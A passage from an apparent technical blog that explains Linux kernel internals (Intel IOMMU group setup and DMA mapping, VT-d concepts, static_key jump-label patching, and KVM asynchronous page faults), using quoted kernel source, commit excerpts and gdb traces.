    return group;
}

Device’s iommu group is stored in ‘device’ struct’s iommu_group. The ‘iommu_group_get’ returns this, if it’s not NULL, just return this group. In the first time, it is NULL, so it calls ‘iommu_ops’s device_group callback, it’s ‘pci_device_group’ for intel iommu.

‘pci_device_group’ will find or create a IOMMU group for a device. There are several cases to get a device IOMMU group from an existing device. For example, if one bridge support ACS, we need to go to the upstream bus. Also a multi-function device’s all function device need to share the same IOMMU group. If ‘pci_device_group’ can’t find a IOMMU group, it calls ‘iommu_group_alloc’ to create a new one. ‘iommu_group_alloc’ will create a number directory in ‘/sys/kernel/iommu_groups’ directory. For example, ‘/sys/kernel/iommu_groups/3’.

After get the device’s IOMMU group, ‘iommu_group_get_for_dev’ calls ‘iommu_group_add_device’ to add the device to the IOMMU group. First create a ‘iommu_group’ link pointing the ‘/sys/kernel/iommu_groups/$group_id’ in the PCI device’s directory. Then it creates a link in ‘/sys/kernel/iommu_groups/$group_id/devices/0000:$pci_bdf” to point the PCI device. Set the device’s iommu_group to ‘group’ and add the deivce to the ‘group->devices’ list.

A lot of function, let’s wrap it up.

intel_iommu_init ->bus_set_iommu ->iommu_bus_init -> add_iommu_group(For each PCI device calls ‘add_iommu_group’) ->iommu_ops->add_device(intel_iommu_add_device) ->device_to_iommu ->iommu_device_link ->iommu_group_get_for_dev ->iommu_ops->device_group(pci_device_group) ->iommu_group_alloc ->iommu_group_add_device

DMA operation without and with IOMMU

Now the IOMMU has been initialized, what’s the difference between with and without IOMMU when devices do DMA. This part I will do some analysis, but not cover all of the detail of DMA.

Device uses ‘dma_alloc_coherent’ function to allocates physical memory to do DMA operation. It returns the virtual address and the DMA physical address is returned in the third argument. ‘dma_alloc_coherent’ will call ‘dma_ops->alloc’. ‘dma_ops’ is set to ‘intel_dma_ops’ in ‘intel_iomu_init’, for intel iommu this callback is ‘intel_alloc_coherent’.

static void *intel_alloc_coherent(struct device *dev, size_t size,
                dma_addr_t *dma_handle, gfp_t flags,
                struct dma_attrs *attrs)
{
    struct page *page = NULL;
    int order;

    size = PAGE_ALIGN(size);
    order = get_order(size);

    if (!iommu_no_mapping(dev))
        flags &= ~(GFP_DMA | GFP_DMA32);
    else if (dev->coherent_dma_mask < dma_get_required_mask(dev)) {
        if (dev->coherent_dma_mask < DMA_BIT_MASK(32))
            flags |= GFP_DMA;
        else
            flags |= GFP_DMA32;
    }

    if (gfpflags_allow_blocking(flags)) {
        unsigned int count = size >> PAGE_SHIFT;

        page = dma_alloc_from_contiguous(dev, count, order);
        if (page && iommu_no_mapping(dev) &&
            page_to_phys(page) + size > dev->coherent_dma_mask) {
            dma_release_from_contiguous(dev, page, count);
            page = NULL;
        }
    }

    if (!page)
        page = alloc_pages(flags, order);
    if (!page)
        return NULL;
    memset(page_address(page), 0, size);

    *dma_handle = __intel_map_single(dev, page_to_phys(page), size,
                    DMA_BIDIRECTIONAL,
                    dev->coherent_dma_mask);
    if (*dma_handle)
        return page_address(page);
    if (!dma_release_from_contiguous(dev, page, size >> PAGE_SHIFT))
        __free_pages(page, order);

    return NULL;
}

First allocates the memory needed(by calling ‘dma_alloc_from_contiguous’ or just ‘alloc_pages’) then canlls ‘__intel_map_single’ to do the memmory map.

static dma_addr_t __intel_map_single(struct device *dev, phys_addr_t paddr,
                    size_t size, int dir, u64 dma_mask)
{
    struct dmar_domain *domain;
    phys_addr_t start_paddr;
    struct iova *iova;
    int prot = 0;
    int ret;
    struct intel_iommu *iommu;
    unsigned long paddr_pfn = paddr >> PAGE_SHIFT;

    ...
    domain = get_valid_domain_for_dev(dev);
    if (!domain)
        return 0;

    iommu = domain_get_iommu(domain);
    size = aligned_nrpages(paddr, size);

    iova = intel_alloc_iova(dev, domain, dma_to_mm_pfn(size), dma_mask);
    if (!iova)
        goto error;

   ...
    ret = domain_pfn_mapping(domain, mm_to_dma_pfn(iova->pfn_lo),
                mm_to_dma_pfn(paddr_pfn), size, prot);
  
    ...
    start_paddr = (phys_addr_t)iova->pfn_lo << PAGE_SHIFT;
    start_paddr += paddr & ~PAGE_MASK;
    return start_paddr;
    ...
}

The skeleton of ‘__intel_map_single’ is showed above. First get/create a domain by calling ‘get_valid_domain_for_dev’, then allocates the IOVA by calling ‘intel_alloc_iova’, finally do the IOVA->physical address mapping by calling ‘domain_pfn_mapping’. The IOVA is returned.

As the domain’s definition indicates, if the system will allocate physical memory to a device, a domain need to be bind to this physical memory. A domain is defined using ‘get_domain_for_dev’ structure.

struct dmar_domain {
    int	nid;			/* node id */

    unsigned	iommu_refcnt[DMAR_UNITS_SUPPORTED];
                    /* Refcount of devices per iommu */


    u16		iommu_did[DMAR_UNITS_SUPPORTED];
                    /* Domain ids per IOMMU. Use u16 since
                    * domain ids are 16 bit wide according
                    * to VT-d spec, section 9.3 */

    struct list_head devices;	/* all devices' list */
    struct iova_domain iovad;	/* iova's that belong to this domain */

    struct dma_pte	*pgd;		/* virtual address */
    int		gaw;		/* max guest address width */

    /* adjusted guest address width, 0 is level 2 30-bit */
    int		agaw;

    int		flags;		/* flags to find out type of domain */

    int		iommu_coherency;/* indicate coherency of iommu access */
    int		iommu_snooping; /* indicate snooping control feature*/
    int		iommu_count;	/* reference count of iommu */
    int		iommu_superpage;/* Level of superpages supported:
                    0 == 4KiB (no superpages), 1 == 2MiB,
                    2 == 1GiB, 3 == 512GiB, 4 == 1TiB */
    u64		max_addr;	/* maximum mapped address */

    struct iommu_domain domain;	/* generic domain data structure for
                    iommu core */
};

‘iovad’ contains a rb-tree to hold all of the IOVA for the domain. ‘pgd’ is the page table directory which is for the iova->physical address. ‘domain’ contains the generic domain data structure. domain is allocated in ‘get_domain_for_dev’.

In ‘get_domain_for_dev’, domain is allocated by calling ‘alloc_domain’ and initialized by calling ‘domain_init’. In ‘domain_init’, ‘init_iova_domain’ is used to init the ‘iovad’ memory to set the start pfn of IOVA to 1 and end pfn of IOVA to 4G. ‘domain_reserve_special_ranges’ is uesd to reverse the special physical memory in ‘reserved_iova_list’ this means the IOVA can’t be one the address in this list. ‘alloc_pgtable_page’ allocates a page table as the page table directory, store it in ‘domain->gpd’.

In ‘get_domain_for_dev’, ‘dmar_insert_one_dev_info’ is called to allocated a ‘device_domain_info’ and stored it in ‘device’s archdata.iommu field. In the end of ‘dmar_insert_one_dev_info’, there is an important step to call ‘domain_context_mapping’. ‘domain_context_mapping’ calls ‘domain_context_mapping_one’ to setup the IOMMU DAM remapping page table. In ‘domain_context_mapping_one’, ‘iommu_context_addr’ is called to get the context entry in context table, then ‘context_set_address_root’ is called to set the context entry’s to the domain’s pgd physical address.

After geting/creating the domain, ‘__intel_map_single’ calls ‘intel_alloc_iova’ to allocates the requested size of IOVA range in this domain. Then calling ‘domain_pfn_mapping’ to setup the mapping. ‘__domain_mapping’ is doing the actual work.

In ‘__domain_mapping’, ‘pfn_to_dma_pte’ will allocate the not-present pte and set it to according the IOVA address. After ‘__domain_mapping’, we has a page table which translate the IOVA to physical address.

Following figure shows the data structure relation.

With the iommu, we can the the dma address is 0xffffxxxx, and the host physical address is 0x384f2000.

(gdb) b vtd_iommu_translate 
Breakpoint 2 at 0x5555572724f2: file /home/test/qemu5/qemu/hw/i386/intel_iommu.c, line 2882.
(gdb) c
Continuing.

Thread 1 "qemu-system-x86" hit Breakpoint 2, vtd_iommu_translate (iommu=0x61a000019ef0, addr=4294951088, flag=IOMMU_WO, iommu_idx=0) at /home/test/qemu5/qemu/hw/i386/intel_iommu.c:2882
2882	{
(gdb) finish
Run till exit from #0  vtd_iommu_translate (iommu=0x61a000019ef0, addr=4294951088, flag=IOMMU_WO, iommu_idx=0) at /home/test/qemu5/qemu/hw/i386/intel_iommu.c:2882
address_space_translate_iommu (iommu_mr=0x61a000019ef0, xlat=0x7fffffffc420, plen_out=0x7fffffffc3e0, page_mask_out=0x0, is_write=true, is_mmio=true, target_as=0x7fffffffc290, attrs=...) at /home/test/qemu5/qemu/exec.c:493
493	        if (!(iotlb.perm & (1 << is_write))) {
Value returned is $5 = {target_as = 0x55555ad79380 <address_space_memory>, iova = 4294950912, translated_addr = 944709632, addr_mask = 4095, perm = IOMMU_RW}
(gdb) p /x $5
$6 = {target_as = 0x55555ad79380, iova = 0xffffc000, translated_addr = 0x384f2000, addr_mask = 0xfff, perm = 0x3}

Without the iommu, we can see the dma address is just the host physical address.

Thread 4 "qemu-system-x86" hit Breakpoint 1, pci_dma_write (dev=0x7fffa3eba800, addr=946098204, buf=0x7fffe4ba6bbc, len=4) at /home/test/qemu5/qemu/include/hw/pci/pci.h:795
795	    return pci_dma_rw(dev, addr, (void *) buf, len, DMA_DIRECTION_FROM_DEVICE);
(gdb) p /x addr
$1 = 0x3864501c
(gdb) 

IOMMU introduction

2019-08-04T00:00:00+00:00

MMU is used by CPU to translate a virtual address to physical address. The virtual address of MMU is in CPU’s view. The IOMMU in contrast is used by device to translate another virtual address called IOVA(IO virtual address) to physical address. Following show the basic idea of IOMMU.

IOMMU is very useful for device assignment in virtual machine platform. Device assignment directly assign the physical IO device to VMs. In device assignment the driver for an assigned IO device runs in the VM to which it is assigned and is allowed to interact directly with the device hardware with minimal or no VMM involvement. Device assignment has very high performance compared with the software-based device emulation and virtio-based device emulation.

Device assignment introduces an issue just like how the virtual machine accesses the VM’s physical memory. In virtual machine environment, the OS in VM uses the virtual address to access data, this guest virtual address(GVA) is translated to guest physical address(GPA). However we still need to access the host physical address as it stores data. This is done by EPT in VT-x hardware. For device assignment, the driver in guest OS specify the guest physical address for DMA, however the physical IO device need the host physical adress to access. The device need something like EPT to translate the DMA address(GPA) specify by device driver in guest OS to host physical address. This is the mainly purpose of IOMMU. IOMMU has the ability to isolate and restrict device accesses to the resources(the physical memory allcated to the VM for example) owned by the virtual machine. Following figure depicts how system software interacts with hardware support for both VT-x and VT-d.

Intel IOMMU(also called VT-d) has the following capabilities:

DMA remapping: this supports address translations for DMA from device.
Interrupt remapping: this supports isolation and routing of interrupts from devices and external interrupt controllers to appropriate VMs.
Interrupt posting: this supports direct delivery of virtual interrupts from devfices and excternal interrupt controllers to virtual processors.

qemu/kvm virtual machine now uses VFIO to do device assignment. VFIO utilizes IOMMU’s DMA remapping to do DMA in VM, but it doesn’t use interrupt remapping as it is not efficient compared with the irqfd in kernel IMO.

The basic idea of IOMMU DMA remapping is the same as the MMU for address translation. When the physical IO device do DMA, the address for DMA is called IOVA, the IOMMU first using the device’s address(PCI BDF address) to find a page table then using the the IOVA to walk this page table and finally get the host physical address. This is very like that how the MMU work to translate a virtual address to a physical address. Following figure show the basic idea of DMA remapping, this is the legacy mode, there is also a scalable mode, though the detail differs, the idea is the same.

The device’s bus is useds to index in Root Table, the root table is 4-KByte in size and contains 256 root-entries. The root-table-entry contains the context-table pointer which references the context-table for all the devices on the bus identified by the root-entry.

A context-entry maps a specific I/O device on a bus to the domain to which it is assigned, and, in turn, to the address translation structures for the domain. Each context-table contains 256 entries, with each entry corresponding to a PCI device function on the bus. For a PCI device, the device and function numbers (lower 8-bits) are used to index into the context-table.

The root-table and context table is setup by the IOMMU driver, the page table is usually setup by the VMM. Of course, any process can do setup this page table. The IOVA is used as the input for the IOMMU translation, this address is device’s view address. The IOVA can be any address that is meaningfor for the guest or process. For example, the qemu/kvm uses the GPA as the IOVA and also you can uses another address as the IOVA. The VFIO uses IOMMU to do the translation from GPA to HPA.

Next I will write the code analysis of the intel IOMMU driver. Also I will write a post for the iommu hardware’s implementation as qemu implements the amd and intel iommu.

Linux static_key internlas

2019-07-20T00:00:00+00:00

static_key introduction

There are often a situation that we need to check some switch to determine which code flow to be executed. In some cases the switch is almost the same (true or false), so the check may influence the performance. static_key and jump label let us do code patch in the address which we need to check. Using static_key, there is no check but just flat code flow. There are a lot of static_key usage introduction, but little internals introduction. This post is try to explain the static_key misc under the surface. This post uses kernel 4.4 as I just have this code in my hand now.

There are three aspects for static_key:

We need to save the static_key information in the ELF file, these information is stored in the ‘__jump_table’ section in ELF file
The kernel need to parse these ‘__jump_table’ information
When we change the switch, the kernel need to update the patched code

The idea of static_key is illustrated as following:

Here in most situation the switch is the ‘most state’ so the red block is nop, this means the switch is in the ‘mostly’ state. When we change the state of the switch,the kernel will update the red block as a jump instruction so that the code can go to the ‘2’ code flow.

Store static_key information in ELF file

static_key is defined by a ‘struct static_key’：

    struct static_key {
            atomic_t enabled;
    /* Set lsb bit to 1 if branch is default true, 0 ot */
            struct jump_entry *entries;
    #ifdef CONFIG_MODULES
            struct static_key_mod *next;
    #endif
    };

The ‘enabled’ indicates the state of static_key, 0 means false and 1 means true. ‘entries’ contains the patching information of jump label, it is defined as following:

    struct jump_entry {
            jump_label_t code;
            jump_label_t target;
            jump_label_t key;
    };

code is the address of ‘patching’, target is where we should jump, and key is the address of static_key.

The ‘next’ field in static_key is used for modules reference the kernel image or other modules’ static_key.

Let’s use the ‘apic_sw_disabled’ in arch/x86/kvm/lapic.c as an example. It is defined as following:

    struct static_key_deferred apic_sw_disabled __read_mostly;

Here the ‘static_key_deferred’ is just a wrapper of static_key, it just contains a ‘timeout’ and a ‘delayed work’ to do the update using a delayed work.

    struct static_key_deferred {
            struct static_key key;
            unsigned long timeout;
            struct delayed_work work;
    };

‘apic_sw_disabled’ is used to determine whether the system software enables the local apic, in most cases, the software will enable this. So the default of ‘apic_sw_disabled’ is false. Notice, the ‘apic_sw_disabled’ is used for all of the vcpu. If any of the vcpu in the host disable the local apic, the ‘apic_sw_disabled’ will be true.

In ‘kvm_apic_sw_enabled’, it calls ‘static_key_false’ to determine ‘apic_sw_disabled.key’. The ‘static_key_false’ just calls ‘arch_static_branch’ and latter is as following:

    static __always_inline bool arch_static_branch(struct static_key *key, bool branch)
    {
            asm_volatile_goto("1:"
                    ".byte " __stringify(STATIC_KEY_INIT_NOP) "\n\t"
                    ".pushsection __jump_table,  \"aw\" \n\t"
                    _ASM_ALIGN "\n\t"
                    _ASM_PTR "1b, %l[l_yes], %c0 + %c1 \n\t"
                    ".popsection \n\t"
                    : :  "i" (key), "i" (branch) : : l_yes);

            return false;
    l_yes:
            return true;
    }

The ‘STATIC_KEY_INIT_NOP’ is ‘no-op instruction’ , it is ‘0x0f,0x1f,0x44,0x00,0’. This is the red block in the first pic. The data between ‘.pushsection’ and ‘.popsection’ will be in ‘__jump_table’ section. For every arch_static_branch call there are three unsigned long data in the ‘__jump_table’. The first unsigned long is the address of ‘1b’, this is the 5 ‘no-op instruction’s address. The second if the address of ‘l_yes’, and the third is the static_key’s address ored with the branch value(false for the static_key_false, and true for the static_key_true).

‘static_key_false’ and ‘arch_static_branch’ is always inline, so ‘kvm_apic_sw_enabled’ will be compiled as following asm instruction.

Notice we have set the ‘kvm_apic_sw_enabled’ as noinline by adding ‘noline’ in the function signature.

As the ‘13f70’ line is no-op instruction, so this ‘kvm_apic_sw_enabled’ always return 1. This is right.

Also after ‘arch_static_branch’ is compiled, there are three unsigned long data in the ‘__jump_table’. It lays as following:

    |no-op address | target address | static_key's address ored with 0|

In this function it is:

    |13f79 | 13f85| kvm_apic_sw_enabled.key's address|

These three data is coressponding to the ‘jump_entry’, The kvm_apic_sw_enabled.key’s address is a global address.

Notice here ‘13f79’ is just the address of the kvm.ko file offset. In module loding, it will be reallocated.

Parses '__jump_table' when startup

In ‘start_kerne’ it calls ‘jump_label_init’ to parse the ‘__jump_table’. For modules, in ‘jump_label_init_module’ it register a module notifier named ‘jump_label_module_nb’, when a module loaded, it calls ‘jump_label_add_module’ to parse ‘__jump_table’. We will deep into the module case. ‘jump_label_add_module’s code is following:

    static int jump_label_add_module(struct module *mod)
    {
            struct jump_entry *iter_start = mod->jump_entries;
            struct jump_entry *iter_stop = iter_start + mod->num_jump_entries;
            struct jump_entry *iter;
            struct static_key *key = NULL;
            struct static_key_mod *jlm;

            /* if the module doesn't have jump label entries, just return */
            if (iter_start == iter_stop)
                    return 0;

            jump_label_sort_entries(iter_start, iter_stop);

            for (iter = iter_start; iter < iter_stop; iter++) {
                    struct static_key *iterk;

                    iterk = jump_entry_key(iter);
                    if (iterk == key)
                            continue;

                    key = iterk;
                    if (within_module(iter->key, mod)) {
                            /*
                            * Set key->entries to iter, but preserve JUMP_LABEL_TRUE_BRANCH.
                            */
                            *((unsigned long *)&key->entries) += (unsigned long)iter;
                            key->next = NULL;
                            continue;
                    }
                    ...
            }

            return 0;
    }

The ‘iter_start’ pointer the first of jump_entries and ‘iter_sopt’ pointer the end of jump_entries. The jump entries is sorted by ‘jump_label_sort_entries’ function. We can get the function of one ‘static_key’ from ‘jump_entry’ entry by calling ‘jump_entry_key’ function. Notice the third of ‘jump_entry’ is the address of static_key ored with the 0 or 1. So ‘jump_entry_key’ clears the first bit.

    static inline struct static_key *jump_entry_key(struct jump_entry *entry)
    {
            return (struct static_key *)((unsigned long)entry->key & ~1UL);
    }

Later if the static_key is defined in this module, ‘jump_label_add_module’ sets this static_key’s entries to the address of ‘jump_entry’. If the static_key is defined in another, we need to uses the ‘next’ field in ‘static_key’ to record this.

After calling ‘jump_label_add_module’, the ‘static_key’ and ‘jump_entry’ has following relation.

patch the function

Now the function ‘kvm_apic_sw_enabled’ return true, means the ‘apic_sw_disabled.key’ is false. However in some point we need to change the ‘apic_sw_disabled.key’ to true. For example in ‘kvm_create_lapic’, it has following statement:

    static_key_slow_inc(&apic_sw_disabled.key);

This means when creating lapic, we need to set ‘apic_sw_disabled.key’ to true.

‘static_key_slow_inc’ calls ‘jump_label_update’ to patch the code, and also set ‘static_key’s enabled to 1.

    static void jump_label_update(struct static_key *key)
    {
            struct jump_entry *stop = __stop___jump_table;
            struct jump_entry *entry = static_key_entries(key);
    #ifdef CONFIG_MODULES
            struct module *mod;

            __jump_label_mod_update(key);

            preempt_disable();
            mod = __module_address((unsigned long)key);
            if (mod)
                    stop = mod->jump_entries + mod->num_jump_entries;
            preempt_enable();
    #endif
            /* if there are no users, entry can be NULL */
            if (entry)
                    __jump_label_update(key, entry, stop);
    }

‘jump_label_update’ get the ‘jump_entry’ from ‘static_key’s ‘entries’ field. The ‘stop’ is either ‘stop_jump_table’ or the ‘static_key’s module’s end of jump entries. Then call ‘__jump_label_update’.

    static void __jump_label_update(struct static_key *key,
                                    struct jump_entry *entry,
                                    struct jump_entry *stop)
    {
            for (; (entry < stop) && (jump_entry_key(entry) == key); entry++) {
                    /*
                    * entry->code set to 0 invalidates module init text sections
                    * kernel_text_address() verifies we are not in core kernel
                    * init code, see jump_label_invalidate_module_init().
                    */
                    if (entry->code && kernel_text_address(entry->code))
                            arch_jump_label_transform(entry, jump_label_type(entry));
            }
    }

After the check, this function calls ‘arch_jump_label_transform’, with the return value of ‘jump_label_type’. ‘jump_label_type’ function return the jump type, means we should use nop or jump. There are two jump type in kernel 4.4, JUMP_LABEL_NOP with 0, and JUMP_LABEL_JMP with 1.

    enum jump_label_type {
            JUMP_LABEL_NOP = 0,
            JUMP_LABEL_JMP,
    };

‘jump_label_type’

    static enum jump_label_type jump_label_type(struct jump_entry *entry)
    {
            struct static_key *key = jump_entry_key(entry);
            bool enabled = static_key_enabled(key);
            bool branch = jump_entry_branch(entry);

            /* See the comment in linux/jump_label.h */
            return enabled ^ branch;
    }

Here the ‘enabled’ is -1(0xffffffff), this is set in ‘static_key_slow_inc’, the branch is the function used, here is 0(static_key_false), so ‘jump_label_type’ return 1.

‘arch_jump_label_transform’ calls ‘__jump_label_transform’ with the type(1, JUMP_LABEL_JMP), poker(NULL), and init(NULL). So the calling code will be:

    static void __jump_label_transform(struct jump_entry *entry,
                                    enum jump_label_type type,
                                    void *(*poker)(void *, const void *, size_t),
                                    int init)
    {
            union jump_code_union code;
            const unsigned char default_nop[] = { STATIC_KEY_INIT_NOP };
            const unsigned char *ideal_nop = ideal_nops[NOP_ATOMIC5];

            if (type == JUMP_LABEL_JMP) {
                    if (init) {
                        ...
                    } else {
                            /*
                            * ...otherwise expect an ideal_nop. Otherwise
                            * something went horribly wrong.
                            */
                            if (unlikely(memcmp((void *)entry->code, ideal_nop, 5)
                                    != 0))
                                    bug_at((void *)entry->code, __LINE__);
                    }

                    code.jump = 0xe9;
                    code.offset = entry->target -
                                    (entry->code + JUMP_LABEL_NOP_SIZE);
            } else {
                  ...
            }

            ...
            if (poker)
                    (*poker)((void *)entry->code, &code, JUMP_LABEL_NOP_SIZE);
            else
                    text_poke_bp((void *)entry->code, &code, JUMP_LABEL_NOP_SIZE,
                            (void *)entry->code + JUMP_LABEL_NOP_SIZE);
    }

The ‘code’ will contains the jump code, the first byte is ‘0xe9’, and later four bytes is the offset to jump. Finally, the ‘__jump_label_transform’ calls ‘text_poke_bp’ to write the ‘jump_entry->code’s 5 bytes as the jump to another branch. In ‘kvm_apic_sw_enabled’ function, it will return ‘apic->sw_enabled’. In ‘static_key_slow_inc’ after ‘jump_label_update’, it will set the ‘key->enabled’ to 1.

‘apic_sw_disabled.key’ is later reenabled by ‘static_key_slow_dec_deferred’ in ‘apic_set_spiv’. When we The delayed work will call ‘__static_key_slow_dec’ finally, and it will decrease the ‘key->enabled’ and later ‘enabled ^ branch’ will be 0, so in ‘__jump_label_transform’ it will patch the code goto no-op instruction.

Reference

[1] kernel static_key doc

[2] int3-based instruction patching

KVM async page fault

2019-03-24T00:00:00+00:00

apf introduction

The qemu/kvm VM’s physical memory is the virtual memory of qemu process. When the virtual memory of qemu has been commit and is setup with physical memory the host can swap out this physical memory. When the guest vcpu access memory swapped out by host its execution is suspended until memory is swapped back. Asynchronous page fault is a way to try and use guest vcpu more efficiently by allowing it to execute other tasks while page is brought back into memory[1]. Following give a summary of these processes.

page fault when the EPT page table is not setup

VMEXIT
kvm_mmu_page_fault()
gfn_to_pfn()
get_user_pages_unlocked()
     no previously mapped page and no swap entry found
     empty page is allocated
page is added into shadow/nested page table

page fault when the physical memory is swapped out(without apf)

 1. VMEXIT
 2. kvm_mmu_page_fault()
 3. gfn_to_pfn()
 4. get_user_pages_unlocked()
     swap entry is found
     page swap-in process is initiated
     vcpu thread goes to sleep until page is swapped in

page fault when the phycial memory is swapped out(with apf)

VMEXIT
kvm_mmu_page_fault()
gfn_to_pfn()
get_user_pages_nowait()
gup is done by dedicated thread, inject 'page not present' exception to guest
guest puts process A(which caused this page fault) to sleep and schedule another process
page is swapped in, inject 'page ready' exception to guest
guest can schedule process A back to run on vcpu

Following shows the process of kvm async page fault process.[2]

From description we know that kvm apf need the guest do something, such as recognize the apf ‘page not present’ and ‘page ready’ exception, and also the para guest should hook the exception to process these two new exception. apf contains following steps.

the guest should be initialized to process the new exception
kvm page fault handler should recognize the swapped out case and initialize a work to swap in the page, inject a 'page not present' to guest
the guest receive this exception and schedule another process to run 
when the page caused page fault in step 2 has been swapped in, the kvm inject a 'page ready' exception to guest
the guest can do schedule to run process that was blocked by page fault in step 2

Next part I will discuss the code in above process.

detail of apf

para guest initialization when startup

commit: KVM paravirt: Add async PF initialization to PV guest.

Here we can see, the apf is enabled default and can be disabled with the ‘no-kvmapf’ parameter in kernel command line.

Every CPU has a per-cpu vairable named ‘apf_reason’, it is defined as following:

    +struct kvm_vcpu_pv_apf_data {
    +	__u32 reason;
    +	__u8 pad[60];
    +	__u32 enabled;
    +};

The ‘reason’ here is the exception of apf, can be ‘KVM_PV_REASON_PAGE_NOT_PRESENT’(1) or ‘KVM_PV_REASON_PAGE_READY’(2), the ‘enabled’ indicates the status of apf. When

If the kvm support apf, the ‘KVM_CPUID_FEATURES’ cpuid leaf has ‘KVM_FEATURE_ASYNC_PF’ feature, When the guest detect this feature, it writes the ‘afp_reason’s physical address to msr ‘MSR_KVM_ASYNC_PF_EN’.

    +void __cpuinit kvm_guest_cpu_init(void)
    +{
    +	if (!kvm_para_available())
    +		return;
    +
    +	if (kvm_para_has_feature(KVM_FEATURE_ASYNC_PF) && kvmapf) {
    +		u64 pa = __pa(&__get_cpu_var(apf_reason));
    +
    +		wrmsrl(MSR_KVM_ASYNC_PF_EN, pa | KVM_ASYNC_PF_ENABLED);
    +		__get_cpu_var(apf_reason).enabled = 1;
    +		printk(KERN_INFO"KVM setup async PF for cpu %d\n",
    +		       smp_processor_id());
    +	}
    +}

guest process the apf exception

commit: KVM: Handle async PF in a guest

In the initialization, it sets the trap_init to ‘kvm_apf_trap_init’, and in the later function it set the ‘14’ gate’s(page fault) handler to ‘async_page_fault’.

    +static void __init kvm_apf_trap_init(void)
    +{
    +	set_intr_gate(14, &async_page_fault);
    +}

The ‘async_page_fault’ calls ‘do_async_page_fault’. The later function first read the ‘

    +u32 kvm_read_and_reset_pf_reason(void)
    +{
    +	u32 reason = 0;
    +
    +	if (__get_cpu_var(apf_reason).enabled) {
    +		reason = __get_cpu_var(apf_reason).reason;
    +		__get_cpu_var(apf_reason).reason = 0;
    +	}
    +
    +	return reason;
    +}


    +dotraplinkage void __kprobes
    +do_async_page_fault(struct pt_regs *regs, unsigned long error_code)
    +{
    +	switch (kvm_read_and_reset_pf_reason()) {
    +	default:
    +		do_page_fault(regs, error_code);
    +		break;
    +	case KVM_PV_REASON_PAGE_NOT_PRESENT:
    +		/* page is swapped out by the host. */
    +		kvm_async_pf_task_wait((u32)read_cr2());
    +		break;
    +	case KVM_PV_REASON_PAGE_READY:
    +		kvm_async_pf_task_wake((u32)read_cr2());
    +		break;
    +	}
    +}
    +

The apf reason is writen to ‘apf_reason.reason’ field by kvm and the guest can read it out. When apf reason is ‘KVM_PV_REASON_PAGE_NOT_PRESENT’ it calls ‘kvm_async_pf_task_wait’ adds current process to a sleep list and reschedule. When the guest receive ‘KVM_PV_REASON_PAGE_READY’ it calls ‘kvm_async_pf_task_wake’ to wakeup the sleep process.

kvm support the apf cpuid feature and msr

commit: KVM: Add PV MSR to enable asynchronous page faults delivery

As we discussed, the kvm should support the ‘KVM_FEATURE_ASYNC_PF’ cpuid and msr ‘MSR_KVM_ASYNC_PF_EN’.

When the guest write to msr ‘MSR_KVM_ASYNC_PF_EN’ the kvm module calls ‘kvm_pv_enable_async_pf’. In this function it saves the per-cpu variable ‘apf_reason’ to ‘vcpu’s arch field ‘apf.msr_val’. ‘kvm_gfn_to_hva_cache_init’ creates a ‘cache’ for gpa to hva so that the kvm can write data to guest more efficiently.

    +static int kvm_pv_enable_async_pf(struct kvm_vcpu *vcpu, u64 data)
    +{
    +	gpa_t gpa = data & ~0x3f;
    +
    +	/* Bits 1:5 are resrved, Should be zero */
    +	if (data & 0x3e)
    +		return 1;
    +
    +	vcpu->arch.apf.msr_val = data;
    +
    +	if (!(data & KVM_ASYNC_PF_ENABLED)) {
    +		kvm_clear_async_pf_completion_queue(vcpu);
    +		kvm_async_pf_hash_reset(vcpu);
    +		return 0;
    +	}
    +
    +	if (kvm_gfn_to_hva_cache_init(vcpu->kvm, &vcpu->arch.apf.data, gpa))
    +		return 1;
    +
    +	kvm_async_pf_wakeup_all(vcpu);
    +	return 0;
    +}
    +

kvm do the apf work

There are two commit with this part. commit: KVM: Halt vcpu if page it tries to access is swapped out this commit setup the framework of apf.

commit: KVM: Inject asynchronous page fault into a PV guest if page is swapped out this commit do the final work

Let’s first look at the first commit.

Every apf work is presented by the following structure.

    +struct kvm_async_pf {
    +	struct work_struct work;
    +	struct list_head link;
    +	struct list_head queue;
    +	struct kvm_vcpu *vcpu;
    +	struct mm_struct *mm;
    +	gva_t gva;
    +	unsigned long addr;
    +	struct kvm_arch_async_pf arch;
    +	struct page *page;
    +	bool done;
    +};

The apf occurs in page fault process, the function is ‘tdp_page_fault’. So this commit add the call to a new function ‘try_async_pf’.

    +static bool try_async_pf(struct kvm_vcpu *vcpu, gfn_t gfn, gva_t gva,
    +			 pfn_t *pfn)
    +{
    +	bool async;
    +
    +	*pfn = gfn_to_pfn_async(vcpu->kvm, gfn, &async);
    +
    +	if (!async)
    +		return false; /* *pfn has correct page already */
    +
    +	put_page(pfn_to_page(*pfn));
    +
    +	if (can_do_async_pf(vcpu)) {
    +		trace_kvm_try_async_get_page(async, *pfn);
    +		if (kvm_find_async_pf_gfn(vcpu, gfn)) {
    +			trace_kvm_async_pf_doublefault(gva, gfn);
    +			kvm_make_request(KVM_REQ_APF_HALT, vcpu);
    +			return true;
    +		} else if (kvm_arch_setup_async_pf(vcpu, gva, gfn))
    +			return true;
    +	}
    +
    +	*pfn = gfn_to_pfn(vcpu->kvm, gfn);
    +
    +	return false;
    +}


    +int kvm_setup_async_pf(struct kvm_vcpu *vcpu, gva_t gva, gfn_t gfn,
    +		       struct kvm_arch_async_pf *arch)
    +{
    +	struct kvm_async_pf *work;
    +
    +	if (vcpu->async_pf.queued >= ASYNC_PF_PER_VCPU)
    +		return 0;
    +
    +	/* setup delayed work */
    +
    +	/*
    +	 * do alloc nowait since if we are going to sleep anyway we
    +	 * may as well sleep faulting in page
    +	 */
    +	work = kmem_cache_zalloc(async_pf_cache, GFP_NOWAIT);
    +	if (!work)
    +		return 0;
    +
    +	work->page = NULL;
    +	work->done = false;
    +	work->vcpu = vcpu;
    +	work->gva = gva;
    +	work->addr = gfn_to_hva(vcpu->kvm, gfn);
    +	work->arch = *arch;
    +	work->mm = current->mm;
    +	atomic_inc(&work->mm->mm_count);
    +	kvm_get_kvm(work->vcpu->kvm);
    +
    +	/* this can't really happen otherwise gfn_to_pfn_async
    +	   would succeed */
    +	if (unlikely(kvm_is_error_hva(work->addr)))
    +		goto retry_sync;
    +
    +	INIT_WORK(&work->work, async_pf_execute);
    +	if (!schedule_work(&work->work))
    +		goto retry_sync;
    +
    +	list_add_tail(&work->queue, &vcpu->async_pf.queue);
    +	vcpu->async_pf.queued++;
    +	kvm_arch_async_page_not_present(vcpu, work);
    +	return 1;
    +retry_sync:
    +	kvm_put_kvm(work->vcpu->kvm);
    +	mmdrop(work->mm);
    +	kmem_cache_free(async_pf_cache, work);
    +	return 0;
    +}

